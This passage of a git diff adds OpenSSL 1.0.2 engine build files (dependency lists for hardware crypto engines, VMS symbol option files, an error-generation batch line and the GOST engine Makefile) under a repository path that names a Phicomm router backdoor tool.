+e_aep.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+e_aep.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+e_aep.o: ../include/openssl/sha.h ../include/openssl/stack.h
+e_aep.o: ../include/openssl/symhacks.h ../include/openssl/x509.h
+e_aep.o: ../include/openssl/x509_vfy.h e_aep.c e_aep_err.c e_aep_err.h
+e_aep.o: vendor_defns/aep.h
+e_atalla.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_atalla.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_atalla.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+e_atalla.o: ../include/openssl/dsa.h ../include/openssl/dso.h
+e_atalla.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_atalla.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_atalla.o: ../include/openssl/engine.h ../include/openssl/err.h
+e_atalla.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_atalla.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_atalla.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+e_atalla.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+e_atalla.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+e_atalla.o: ../include/openssl/sha.h ../include/openssl/stack.h
+e_atalla.o: ../include/openssl/symhacks.h ../include/openssl/x509.h
+e_atalla.o: ../include/openssl/x509_vfy.h e_atalla.c e_atalla_err.c
+e_atalla.o: e_atalla_err.h vendor_defns/atalla.h
+e_capi.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_capi.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+e_capi.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_capi.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_capi.o: ../include/openssl/engine.h ../include/openssl/evp.h
+e_capi.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+e_capi.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+e_capi.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+e_capi.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+e_capi.o: ../include/openssl/sha.h ../include/openssl/stack.h
+e_capi.o: ../include/openssl/symhacks.h ../include/openssl/x509.h
+e_capi.o: ../include/openssl/x509_vfy.h e_capi.c
+e_chil.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_chil.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_chil.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+e_chil.o: ../include/openssl/dso.h ../include/openssl/e_os2.h
+e_chil.o: ../include/openssl/ec.h ../include/openssl/ecdh.h
+e_chil.o: ../include/openssl/ecdsa.h ../include/openssl/engine.h
+e_chil.o: ../include/openssl/err.h ../include/openssl/evp.h
+e_chil.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+e_chil.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+e_chil.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+e_chil.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+e_chil.o: ../include/openssl/pkcs7.h ../include/openssl/rand.h
+e_chil.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+e_chil.o: ../include/openssl/sha.h ../include/openssl/stack.h
+e_chil.o: ../include/openssl/symhacks.h ../include/openssl/ui.h
+e_chil.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h e_chil.c
+e_chil.o: e_chil_err.c e_chil_err.h vendor_defns/hwcryptohook.h
+e_cswift.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_cswift.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_cswift.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+e_cswift.o: ../include/openssl/dsa.h ../include/openssl/dso.h
+e_cswift.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_cswift.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_cswift.o: ../include/openssl/engine.h ../include/openssl/err.h
+e_cswift.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_cswift.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_cswift.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+e_cswift.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+e_cswift.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+e_cswift.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+e_cswift.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+e_cswift.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h e_cswift.c
+e_cswift.o: e_cswift_err.c e_cswift_err.h vendor_defns/cswift.h
+e_gmp.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_gmp.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_gmp.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+e_gmp.o: ../include/openssl/ec.h ../include/openssl/ecdh.h
+e_gmp.o: ../include/openssl/ecdsa.h ../include/openssl/engine.h
+e_gmp.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_gmp.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_gmp.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+e_gmp.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+e_gmp.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+e_gmp.o: ../include/openssl/sha.h ../include/openssl/stack.h
+e_gmp.o: ../include/openssl/symhacks.h ../include/openssl/x509.h
+e_gmp.o: ../include/openssl/x509_vfy.h e_gmp.c
+e_nuron.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_nuron.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_nuron.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+e_nuron.o: ../include/openssl/dsa.h ../include/openssl/dso.h
+e_nuron.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_nuron.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_nuron.o: ../include/openssl/engine.h ../include/openssl/err.h
+e_nuron.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_nuron.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_nuron.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+e_nuron.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+e_nuron.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+e_nuron.o: ../include/openssl/sha.h ../include/openssl/stack.h
+e_nuron.o: ../include/openssl/symhacks.h ../include/openssl/x509.h
+e_nuron.o: ../include/openssl/x509_vfy.h e_nuron.c e_nuron_err.c e_nuron_err.h
+e_padlock.o: ../include/openssl/aes.h ../include/openssl/asn1.h
+e_padlock.o: ../include/openssl/bio.h ../include/openssl/buffer.h
+e_padlock.o: ../include/openssl/crypto.h ../include/openssl/dso.h
+e_padlock.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_padlock.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_padlock.o: ../include/openssl/engine.h ../include/openssl/err.h
+e_padlock.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_padlock.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_padlock.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+e_padlock.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+e_padlock.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+e_padlock.o: ../include/openssl/sha.h ../include/openssl/stack.h
+e_padlock.o: ../include/openssl/symhacks.h ../include/openssl/x509.h
+e_padlock.o: ../include/openssl/x509_vfy.h e_padlock.c
+e_sureware.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_sureware.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_sureware.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+e_sureware.o: ../include/openssl/dsa.h ../include/openssl/dso.h
+e_sureware.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_sureware.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_sureware.o: ../include/openssl/engine.h ../include/openssl/err.h
+e_sureware.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_sureware.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_sureware.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+e_sureware.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+e_sureware.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+e_sureware.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+e_sureware.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+e_sureware.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+e_sureware.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+e_sureware.o: e_sureware.c e_sureware_err.c e_sureware_err.h
+e_sureware.o: vendor_defns/sureware.h
+e_ubsec.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_ubsec.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_ubsec.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+e_ubsec.o: ../include/openssl/dsa.h ../include/openssl/dso.h
+e_ubsec.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_ubsec.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_ubsec.o: ../include/openssl/engine.h ../include/openssl/err.h
+e_ubsec.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_ubsec.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_ubsec.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+e_ubsec.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+e_ubsec.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+e_ubsec.o: ../include/openssl/sha.h ../include/openssl/stack.h
+e_ubsec.o: ../include/openssl/symhacks.h ../include/openssl/x509.h
+e_ubsec.o: ../include/openssl/x509_vfy.h e_ubsec.c e_ubsec_err.c e_ubsec_err.h
+e_ubsec.o: vendor_defns/hw_ubsec.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/alpha.opt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/alpha.opt
new file mode 100644
index 0000000..1dc71bf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/alpha.opt
@@ -0,0 +1 @@
+SYMBOL_VECTOR=(bind_engine=PROCEDURE,v_check=PROCEDURE)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/axp.opt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/axp.opt
new file mode 100644
index 0000000..1dc71bf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/axp.opt
@@ -0,0 +1 @@
+SYMBOL_VECTOR=(bind_engine=PROCEDURE,v_check=PROCEDURE)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/capierr.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/capierr.bat
new file mode 100644
index 0000000..274ffac
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/capierr.bat
@@ -0,0 +1 @@
+perl ../util/mkerr.pl -conf e_capi.ec -nostatic -staticloader -write e_capi.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/Makefile
new file mode 100644
index 0000000..2f36580
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/Makefile
@@ -0,0 +1,274 @@
+DIR=ccgost
+TOP=../..
+CC=cc
+INCLUDES= -I../../include
+CFLAG=-g
+MAKEFILE= Makefile
+AR= ar r
+CFLAGS= $(INCLUDES) $(CFLAG)
+LIB=$(TOP)/libcrypto.a
+
+LIBSRC= gost2001.c gost2001_keyx.c gost89.c gost94_keyx.c gost_ameth.c gost_asn1.c gost_crypt.c gost_ctl.c gost_eng.c gosthash.c gost_keywrap.c gost_md.c gost_params.c gost_pmeth.c gost_sign.c
+
+LIBOBJ= e_gost_err.o gost2001_keyx.o gost2001.o gost89.o gost94_keyx.o gost_ameth.o gost_asn1.o gost_crypt.o gost_ctl.o gost_eng.o gosthash.o gost_keywrap.o gost_md.o gost_params.o gost_pmeth.o gost_sign.o
+
+SRC=$(LIBSRC)
+
+LIBNAME=gost
+
+top: 
+	(cd $(TOP); $(MAKE) DIRS=engines EDIRS=$(DIR) sub_all)
+
+all: lib
+
+tags:
+	ctags $(SRC)
+
+errors:
+	$(PERL) ../../util/mkerr.pl -conf gost.ec -nostatic -write $(SRC)
+
+lib: $(LIBOBJ)
+	if [ -n "$(SHARED_LIBS)" ]; then \
+		$(MAKE) -f $(TOP)/Makefile.shared -e \
+			LIBNAME=$(LIBNAME) \
+			LIBEXTRAS='$(LIBOBJ)' \
+			LIBDEPS='-L$(TOP) -lcrypto' \
+			link_o.$(SHLIB_TARGET); \
+	else \
+		$(AR) $(LIB) $(LIBOBJ); \
+	fi
+	@touch lib
+
+install:
+	[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	if [ -n "$(SHARED_LIBS)" ]; then \
+		set -e; \
+		echo installing $(LIBNAME); \
+		pfx=lib; \
+		if expr "$(PLATFORM)" : "Cygwin" >/dev/null; then \
+			sfx=".so"; \
+			cp cyg$(LIBNAME).dll $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$${pfx}$(LIBNAME)$$sfx.new; \
+		else \
+			case "$(CFLAGS)" in \
+			*DSO_BEOS*) sfx=".so";; \
+			*DSO_DLFCN*) sfx=`expr "$(SHLIB_EXT)" : '.*\(\.[a-z][a-z]*\)' \| ".so"`;; \
+			*DSO_DL*) sfx=".sl";; \
+			*DSO_WIN32*) sfx="eay32.dll"; pfx=;; \
+			*) sfx=".bad";; \
+			esac; \
+			cp $${pfx}$(LIBNAME)$$sfx $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$${pfx}$(LIBNAME)$$sfx.new; \
+		fi; \
+		chmod 555 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$${pfx}$(LIBNAME)$$sfx.new; \
+		mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$${pfx}$(LIBNAME)$$sfx.new $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$${pfx}$(LIBNAME)$$sfx; \
+	fi
+
+links:
+
+tests:
+
+depend:
+	@if [ -z "$(THIS)" ]; then \
+	    $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; \
+	else \
+	    $(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC); \
+	fi
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff *.so *.sl *.dll
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+gost2001.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost2001.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost2001.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost2001.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+gost2001.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+gost2001.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+gost2001.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+gost2001.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+gost2001.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+gost2001.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gost2001.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+gost2001.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+gost2001.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+gost2001.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+gost2001.o: e_gost_err.h gost2001.c gost89.h gost_lcl.h gost_params.h
+gost2001.o: gosthash.h
+gost2001_keyx.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost2001_keyx.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost2001_keyx.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost2001_keyx.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+gost2001_keyx.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+gost2001_keyx.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+gost2001_keyx.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+gost2001_keyx.o: ../../include/openssl/obj_mac.h
+gost2001_keyx.o: ../../include/openssl/objects.h
+gost2001_keyx.o: ../../include/openssl/opensslconf.h
+gost2001_keyx.o: ../../include/openssl/opensslv.h
+gost2001_keyx.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+gost2001_keyx.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+gost2001_keyx.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+gost2001_keyx.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+gost2001_keyx.o: ../../include/openssl/x509_vfy.h e_gost_err.h gost2001_keyx.c
+gost2001_keyx.o: gost2001_keyx.h gost89.h gost_keywrap.h gost_lcl.h gosthash.h
+gost89.o: gost89.c gost89.h
+gost94_keyx.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost94_keyx.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost94_keyx.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost94_keyx.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+gost94_keyx.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+gost94_keyx.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+gost94_keyx.o: ../../include/openssl/engine.h ../../include/openssl/evp.h
+gost94_keyx.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+gost94_keyx.o: ../../include/openssl/objects.h
+gost94_keyx.o: ../../include/openssl/opensslconf.h
+gost94_keyx.o: ../../include/openssl/opensslv.h
+gost94_keyx.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+gost94_keyx.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+gost94_keyx.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+gost94_keyx.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+gost94_keyx.o: ../../include/openssl/x509_vfy.h e_gost_err.h gost89.h
+gost94_keyx.o: gost94_keyx.c gost_keywrap.h gost_lcl.h gosthash.h
+gost_ameth.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost_ameth.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost_ameth.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+gost_ameth.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+gost_ameth.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+gost_ameth.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+gost_ameth.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+gost_ameth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+gost_ameth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+gost_ameth.o: ../../include/openssl/opensslconf.h
+gost_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gost_ameth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+gost_ameth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+gost_ameth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+gost_ameth.o: ../../include/openssl/x509_vfy.h e_gost_err.h gost89.h
+gost_ameth.o: gost_ameth.c gost_lcl.h gost_params.h gosthash.h
+gost_asn1.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost_asn1.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost_asn1.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost_asn1.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+gost_asn1.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+gost_asn1.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+gost_asn1.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+gost_asn1.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+gost_asn1.o: ../../include/openssl/opensslconf.h
+gost_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gost_asn1.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+gost_asn1.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+gost_asn1.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+gost_asn1.o: ../../include/openssl/x509_vfy.h gost89.h gost_asn1.c gost_lcl.h
+gost_asn1.o: gosthash.h
+gost_crypt.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost_crypt.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost_crypt.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost_crypt.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+gost_crypt.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+gost_crypt.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+gost_crypt.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+gost_crypt.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+gost_crypt.o: ../../include/openssl/opensslconf.h
+gost_crypt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gost_crypt.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+gost_crypt.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+gost_crypt.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+gost_crypt.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+gost_crypt.o: e_gost_err.h gost89.h gost_crypt.c gost_lcl.h gosthash.h
+gost_ctl.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost_ctl.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost_ctl.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost_ctl.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+gost_ctl.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+gost_ctl.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+gost_ctl.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+gost_ctl.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+gost_ctl.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+gost_ctl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gost_ctl.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+gost_ctl.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+gost_ctl.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+gost_ctl.o: ../../include/openssl/x509_vfy.h gost89.h gost_ctl.c gost_lcl.h
+gost_ctl.o: gosthash.h
+gost_eng.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost_eng.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost_eng.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost_eng.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+gost_eng.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+gost_eng.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+gost_eng.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+gost_eng.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+gost_eng.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+gost_eng.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gost_eng.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+gost_eng.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+gost_eng.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+gost_eng.o: ../../include/openssl/x509_vfy.h e_gost_err.h gost89.h gost_eng.c
+gost_eng.o: gost_lcl.h gosthash.h
+gost_keywrap.o: gost89.h gost_keywrap.c gost_keywrap.h
+gost_md.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost_md.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost_md.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost_md.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+gost_md.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+gost_md.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+gost_md.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+gost_md.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+gost_md.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+gost_md.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+gost_md.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+gost_md.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+gost_md.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+gost_md.o: e_gost_err.h gost89.h gost_lcl.h gost_md.c gosthash.h
+gost_params.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+gost_params.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+gost_params.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+gost_params.o: ../../include/openssl/opensslconf.h
+gost_params.o: ../../include/openssl/opensslv.h
+gost_params.o: ../../include/openssl/ossl_typ.h
+gost_params.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+gost_params.o: ../../include/openssl/symhacks.h gost_params.c gost_params.h
+gost_pmeth.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost_pmeth.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost_pmeth.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+gost_pmeth.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+gost_pmeth.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+gost_pmeth.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+gost_pmeth.o: ../../include/openssl/engine.h ../../include/openssl/evp.h
+gost_pmeth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+gost_pmeth.o: ../../include/openssl/objects.h
+gost_pmeth.o: ../../include/openssl/opensslconf.h
+gost_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gost_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+gost_pmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+gost_pmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+gost_pmeth.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+gost_pmeth.o: e_gost_err.h gost89.h gost_lcl.h gost_params.h gost_pmeth.c
+gost_pmeth.o: gosthash.h
+gost_sign.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+gost_sign.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+gost_sign.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+gost_sign.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+gost_sign.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+gost_sign.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+gost_sign.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+gost_sign.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+gost_sign.o: ../../include/openssl/opensslconf.h
+gost_sign.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+gost_sign.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+gost_sign.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+gost_sign.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+gost_sign.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+gost_sign.o: e_gost_err.h gost89.h gost_lcl.h gost_params.h gost_sign.c
+gost_sign.o: gosthash.h
+gosthash.o: gost89.h gosthash.c gosthash.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/Makefile.save
new file mode 100644
index 0000000..2f36580
--- /dev/null
